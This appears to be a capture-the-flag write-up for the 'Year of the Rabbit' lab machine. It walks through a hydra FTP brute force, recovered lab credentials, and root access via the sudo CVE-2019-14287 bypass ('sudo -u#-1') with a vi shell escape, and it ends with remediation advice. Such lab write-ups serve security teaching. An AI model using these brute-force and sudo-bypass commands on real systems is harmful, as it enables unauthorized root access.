Target IP: 10.201.x.x (Requires /etc/hosts entry usually, though IP works)
Difficulty: Easy/Medium
Objective: User (gwendoline) & Root (root.txt)
1. Executive Summary
“Year of the Rabbit” is a Linux machine that hides its initial entry point within web assets. Initial access involves inspecting web traffic to find a hidden directory, brute-forcing FTP credentials using a provided wordlist, and decoding esoteric languages (Brainfuck). Lateral movement relies on finding hidden files on the filesystem. Privilege escalation exploits CVE-2019-14287, a security bypass in sudo that allows a user restricted from running commands as root to do so by specifying the User ID -1.
Key TTPs (MITRE ATT&CK):
- T1040 (Network Sniffing): Inspecting HTTP requests for hidden paths.
- T1110 (Brute Force): Credential stuffing on FTP.
- T1027 (Obfuscated Files or Information): Brainfuck decoding.
- T1548.003 (Sudo and Sudo Caching): Exploiting Sudo CVE-2019-14287.
2. Enumeration
A. Network Scanning
Nmap reveals:
- 21/tcp (FTP):
vsftpd 3.0.2. - 22/tcp (SSH): OpenSSH 6.7p1 (Debian 5 - Old!).
- 80/tcp (HTTP): Apache Default Page.
B. Web Forensics (The Hidden Asset)
The default Apache page looks boring, but inspecting the Network Tab (in browser dev tools) or using Burp Suite reveals a request to a CSS file that redirects strangely.
- Request:
/assets/style.css(or similar). - Interception: You noticed it redirected to or contained:
/intermediary.php?hidden_directory=/WExYY2Cv-qU.
C. The Hidden Directory
Navigating to http://10.201.x.x/WExYY2Cv-qU reveals:
- Image: A “Hot Babe” (Rick & Morty reference).
- Wordlist: A list of potential passwords.
- Username: Explicitly stated as
ftpuser.
3. Initial Access: The Rabbit Hole
A. FTP Brute Force
We have the user (ftpuser) and a small wordlist.
hydra -l ftpuser -P wordlist.txt ftp://10.201.x.x- Password:
5iez1wGXKfPKQ
B. Brainfuck Decoding
Logging into FTP reveals a file named eli (or content inside a file) containing Brainfuck code (++++++++++[>+...>).
C. SSH Access
ssh eli@10.201.x.x
# Password: DSpDiM1wAEwidStatus: User eli.
4. Lateral Movement: Gwendoline
A. Enumeration
Upon login, a message from Root hints at a “s3cr3t hiding place.” We search for it:
find / -name "*s3cr3t*" 2>/dev/null
# or
ls -la /usr/games/Found: /usr/games/s3cr3t.
B. The Hidden Message
Inside, we find a hidden file .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!.
cat .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!- Credentials:
gwendoline:MniVCQVhQHUNI.
C. Switch User
su gwendolineUser Flag: user.txt.
5. Privilege Escalation: CVE-2019-14287
A. Sudo Analysis
sudo -lOutput:
User gwendoline may run the following commands on year-of-the-rabbit:
(ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt- Constraint: We can run
vi, but the configuration explicitly says!root(Not Root). This is intended to prevent us from running it as UID 0.
B. The Exploit (Integer Overflow)
This is CVE-2019-14287.
When sudo is configured to allow a command but deny root, older versions fail to validate the User ID -1 (or 4294967295).
Sudo parses -1 as an unsigned integer, which wraps around to 0 (Root), effectively bypassing the name check.
Command:
sudo -u#-1 /usr/bin/vi /home/gwendoline/user.txtC. The Shell Escape
Once vi opens (running as root due to the exploit), we escape to a shell.
- Press
ESC. - Type
:!/bin/shor:shell. - Press
Enter.
Result:
# whoami
rootRoot Flag: /root/root.txt.
6. Remediation (Blue Team)
- Patch Sudo: Update
sudoto version 1.8.28 or higher immediately to fix CVE-2019-14287. - Sudo Configuration:
- Avoid giving
NOPASSWDaccess to editors (vi,nano,man) as they allow trivial shell escapes. - If
viis needed, restrict it usingsudoeditor specific wrappers, though this is still risky.
- Web Assets:
- Clean up development artifacts (
/intermediary.php) and wordlists from web directories. - Do not hide security through obscurity (hidden directory parameters).